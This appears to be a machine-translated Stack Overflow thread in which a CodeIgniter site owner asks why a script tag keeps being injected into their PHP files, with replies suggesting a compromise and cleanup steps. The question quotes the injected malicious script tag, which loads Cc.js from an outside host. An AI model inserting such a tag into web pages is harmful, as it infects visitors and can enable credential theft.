我的网站有问题。我不这样做为什么index.php被插入下面的脚本。这个index.php是codeigniter的一部分,这是我当前使用的框架。这是插入通过访问FTP或通过代码。在我删除这个脚本后,我发现在浏览器的左下角有另一个正在读取的URL。我不知道如何跟踪这个,因为我试图找到这个网址,但我看不到它。请帮我我网站上的另一个网址链接
我遇到这种情况两次。
任何建议将不胜感激。
<script type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></script>
<!--11428cb2b3b67368730c012cb53eb247-->
您的网站可能已被攻击者入侵。如果您有任何世界可写的文件夹(请检查您的文件夹权限),可能会发生此类事情。还要检查之前没有的新文件(它们可以被命名为任何文件,并且可以位于网站根文件夹中的任何文件夹中)。
有关类似的攻击一些更多的信息,请参阅:
http://forums.techguy.org/virus-other-malware-removal/871970-strange-b1-html-tag-embedding.html
和
http://www.phpfreaks.com/forums/index.php/topic,274404.msg1297647.html#msg1297647
嗨,感谢您的回复 我的意思是在我的php,html和js脚本已经插入的结尾,我试图替换所有的文件,但一小时后它又被攻击了。我的文件夹在ftp中的文件属性,只有拥有者的权限已经被检查。我试图看看你提供的论坛链接,但我找不到任何明确的解决方案。非常感谢 – tirso 2010-07-09 08:05:56
更改受影响的文件不会解决任何问题。您需要根除上传到网站文件夹中的脚本(可能有一个或多个脚本)。 老实说,处理它的最好方法可能是先安装Code Ignitor,然后手动引入对代码库所做的任何更改/添加。否则,您可能会错过其中一个恶意脚本并回到原点。 – ashicus 2010-07-13 01:30:13
嗨我得到了一些信息在这里:http://www.everythingilike.com/roundstorm-ftp-hack-solution
基本上JS砍插入一个执行的Java应用程序。这个Java应用程序扫描您的FTP信息,甚至任何Shell/SSH登录信息。我建议在清理完后更改所有密码。
你是什么意思index.pp被插入?像src =“http://index.php/drunkjeans.com:8080/Cc.js? – ggfan 2010-07-09 03:26:47
你的问题并不清楚,你正在使用CI.IIRC,CI使用的index.php文件与其他框架非常相似。知道CI的工作原理吗?你正在开发还是你继承了这个项目? 你想知道如何插入脚本标记吗? – 2010-07-09 03:36:52
如果你还没有改变CI的选项,默认情况下应该是index.php显示 – ggfan 2010-07-09 03:38:46